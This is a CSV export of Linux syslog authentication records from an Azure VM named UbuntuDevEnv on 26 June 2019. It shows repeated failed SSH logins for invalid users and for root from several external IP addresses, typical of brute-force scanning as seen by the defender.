+5432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:58:47,UbuntuDevEnv,2019-06-26 15:58:47,auth,UbuntuDevEnv,info,Invalid user annulee from 192.241.213.168 port 44780,29343,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,annulee,192.241.213.1,44780,,
+5433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:58:49,UbuntuDevEnv,2019-06-26 15:58:48,auth,UbuntuDevEnv,info,Failed password for invalid user annulee from 192.241.213.168 port 44780 ssh2,29343,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,annulee,192.241.213.1,44780,,
+5434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:58:49,UbuntuDevEnv,2019-06-26 15:58:48,auth,UbuntuDevEnv,info,Disconnected from invalid user annulee 192.241.213.168 port 44780 [preauth],29343,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,annulee,192.241.213.1,44780,,
+5435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:58:49,UbuntuDevEnv,2019-06-26 15:58:48,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 44780:11: Bye Bye [preauth],29343,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,44780,,
+5436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:59:05,UbuntuDevEnv,2019-06-26 15:59:05,auth,UbuntuDevEnv,info,Invalid user nagios from 66.70.130.155 port 43128,29416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,66.70.130.1,43128,,
+5437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:59:05,UbuntuDevEnv,2019-06-26 15:59:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,29416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:59:05,UbuntuDevEnv,2019-06-26 15:59:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,29416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:59:07,UbuntuDevEnv,2019-06-26 15:59:06,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 66.70.130.155 port 43128 ssh2,29416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,66.70.130.1,43128,,
+5440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:59:07,UbuntuDevEnv,2019-06-26 15:59:06,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios 66.70.130.155 port 43128 [preauth],29416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,66.70.130.1,43128,,
+5441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:59:07,UbuntuDevEnv,2019-06-26 15:59:06,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 43128:11: Bye Bye [preauth],29416,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,43128,,
+5442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:01:05,UbuntuDevEnv,2019-06-26 16:01:04,auth,UbuntuDevEnv,info,Invalid user webmaster from 66.70.130.155 port 60108,29928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmaster,66.70.130.1,60108,,
+5443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:01:05,UbuntuDevEnv,2019-06-26 16:01:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,29928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:01:05,UbuntuDevEnv,2019-06-26 16:01:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,29928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:01:06,UbuntuDevEnv,2019-06-26 16:01:06,auth,UbuntuDevEnv,info,Failed password for invalid user webmaster from 66.70.130.155 port 60108 ssh2,29928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmaster,66.70.130.1,60108,,
+5446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:01:06,UbuntuDevEnv,2019-06-26 16:01:06,auth,UbuntuDevEnv,info,Disconnected from invalid user webmaster 66.70.130.155 port 60108 [preauth],29928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webmaster,66.70.130.1,60108,,
+5447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:01:06,UbuntuDevEnv,2019-06-26 16:01:06,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 60108:11: Bye Bye [preauth],29928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,60108,,
+5448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:03:04,UbuntuDevEnv,2019-06-26 16:03:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,30336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:03:04,UbuntuDevEnv,2019-06-26 16:03:03,auth,UbuntuDevEnv,info,Invalid user ftp from 66.70.130.155 port 48854,30336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,66.70.130.1,48854,,
+5450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:03:04,UbuntuDevEnv,2019-06-26 16:03:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,30336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:03:06,UbuntuDevEnv,2019-06-26 16:03:05,auth,UbuntuDevEnv,info,Failed password for invalid user ftp from 66.70.130.155 port 48854 ssh2,30336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,66.70.130.1,48854,,
+5452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:03:06,UbuntuDevEnv,2019-06-26 16:03:05,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 48854:11: Bye Bye [preauth],30336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,48854,,
+5453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:03:06,UbuntuDevEnv,2019-06-26 16:03:05,auth,UbuntuDevEnv,info,Disconnected from invalid user ftp 66.70.130.155 port 48854 [preauth],30336,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,66.70.130.1,48854,,
+5454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:03:54,UbuntuDevEnv,2019-06-26 16:03:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18  user=root,30523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,81.0.212.1,,0,
+5455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:03:56,UbuntuDevEnv,2019-06-26 16:03:55,auth,UbuntuDevEnv,info,Failed password for root from 81.0.212.18 port 33064 ssh2,30523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,33064,,
+5456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:03:56,UbuntuDevEnv,2019-06-26 16:03:56,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 33064:11: Bye Bye [preauth],30523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,33064,,
+5457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:03:56,UbuntuDevEnv,2019-06-26 16:03:56,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 81.0.212.18 port 33064 [preauth],30523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,81.0.212.1,33064,,
+5458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:05:04,UbuntuDevEnv,2019-06-26 16:05:03,auth,UbuntuDevEnv,info,Invalid user alex from 66.70.130.155 port 37600,30771,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alex,66.70.130.1,37600,,
+5459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:05:04,UbuntuDevEnv,2019-06-26 16:05:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,30771,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:05:04,UbuntuDevEnv,2019-06-26 16:05:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,30771,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:05:06,UbuntuDevEnv,2019-06-26 16:05:06,auth,UbuntuDevEnv,info,Failed password for invalid user alex from 66.70.130.155 port 37600 ssh2,30771,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alex,66.70.130.1,37600,,
+5462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:05:06,UbuntuDevEnv,2019-06-26 16:05:06,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 37600:11: Bye Bye [preauth],30771,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,37600,,
+5463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:05:06,UbuntuDevEnv,2019-06-26 16:05:06,auth,UbuntuDevEnv,info,Disconnected from invalid user alex 66.70.130.155 port 37600 [preauth],30771,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alex,66.70.130.1,37600,,
+5464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:07:02,UbuntuDevEnv,2019-06-26 16:07:01,auth,UbuntuDevEnv,info,Invalid user wi from 66.70.130.155 port 54578,31175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wi,66.70.130.1,54578,,
+5465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:07:02,UbuntuDevEnv,2019-06-26 16:07:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,31175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:07:02,UbuntuDevEnv,2019-06-26 16:07:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,31175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:07:04,UbuntuDevEnv,2019-06-26 16:07:03,auth,UbuntuDevEnv,info,Failed password for invalid user wi from 66.70.130.155 port 54578 ssh2,31175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wi,66.70.130.1,54578,,
+5468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:07:04,UbuntuDevEnv,2019-06-26 16:07:03,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 54578:11: Bye Bye [preauth],31175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,54578,,
+5469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:07:04,UbuntuDevEnv,2019-06-26 16:07:03,auth,UbuntuDevEnv,info,Disconnected from invalid user wi 66.70.130.155 port 54578 [preauth],31175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wi,66.70.130.1,54578,,
+5470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:09:08,UbuntuDevEnv,2019-06-26 16:09:08,auth,UbuntuDevEnv,info,Invalid user tony from 66.70.130.155 port 43328,31616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tony,66.70.130.1,43328,,
+5471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:09:08,UbuntuDevEnv,2019-06-26 16:09:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,31616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:09:08,UbuntuDevEnv,2019-06-26 16:09:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,31616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:09:10,UbuntuDevEnv,2019-06-26 16:09:10,auth,UbuntuDevEnv,info,Failed password for invalid user tony from 66.70.130.155 port 43328 ssh2,31616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tony,66.70.130.1,43328,,
+5474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:09:11,UbuntuDevEnv,2019-06-26 16:09:10,auth,UbuntuDevEnv,info,Disconnected from invalid user tony 66.70.130.155 port 43328 [preauth],31616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tony,66.70.130.1,43328,,
+5475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:09:11,UbuntuDevEnv,2019-06-26 16:09:10,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 43328:11: Bye Bye [preauth],31616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,43328,,
+5476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:11:12,UbuntuDevEnv,2019-06-26 16:11:12,auth,UbuntuDevEnv,info,Invalid user biz from 66.70.130.155 port 60306,32048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,biz,66.70.130.1,60306,,
+5477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:11:12,UbuntuDevEnv,2019-06-26 16:11:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,32048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:11:12,UbuntuDevEnv,2019-06-26 16:11:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,32048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:11:14,UbuntuDevEnv,2019-06-26 16:11:13,auth,UbuntuDevEnv,info,Failed password for invalid user biz from 66.70.130.155 port 60306 ssh2,32048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,biz,66.70.130.1,60306,,
+5480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:11:14,UbuntuDevEnv,2019-06-26 16:11:13,auth,UbuntuDevEnv,info,Disconnected from invalid user biz 66.70.130.155 port 60306 [preauth],32048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,biz,66.70.130.1,60306,,
+5481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:11:14,UbuntuDevEnv,2019-06-26 16:11:13,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 60306:11: Bye Bye [preauth],32048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,60306,,
+5482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:13:12,UbuntuDevEnv,2019-06-26 16:13:11,auth,UbuntuDevEnv,info,Invalid user student03 from 66.70.130.155 port 49052,32468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student03,66.70.130.1,49052,,
+5483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:13:12,UbuntuDevEnv,2019-06-26 16:13:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,32468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:13:12,UbuntuDevEnv,2019-06-26 16:13:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,32468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:13:13,UbuntuDevEnv,2019-06-26 16:13:13,auth,UbuntuDevEnv,info,Failed password for invalid user student03 from 66.70.130.155 port 49052 ssh2,32468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student03,66.70.130.1,49052,,
+5486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:13:13,UbuntuDevEnv,2019-06-26 16:13:13,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 49052:11: Bye Bye [preauth],32468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,49052,,
+5487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:13:13,UbuntuDevEnv,2019-06-26 16:13:13,auth,UbuntuDevEnv,info,Disconnected from invalid user student03 66.70.130.155 port 49052 [preauth],32468,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student03,66.70.130.1,49052,,
+5488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:14:52,UbuntuDevEnv,2019-06-26 16:14:52,auth,UbuntuDevEnv,info,Invalid user ftpuser from 125.212.254.144 port 49614,32831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,125.212.254.1,49614,,
+5489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:14:52,UbuntuDevEnv,2019-06-26 16:14:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,32831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:14:52,UbuntuDevEnv,2019-06-26 16:14:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=125.212.254.144,32831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,125.212.254.1,,0,
+5491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:14:55,UbuntuDevEnv,2019-06-26 16:14:54,auth,UbuntuDevEnv,info,Failed password for invalid user ftpuser from 125.212.254.144 port 49614 ssh2,32831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,125.212.254.1,49614,,
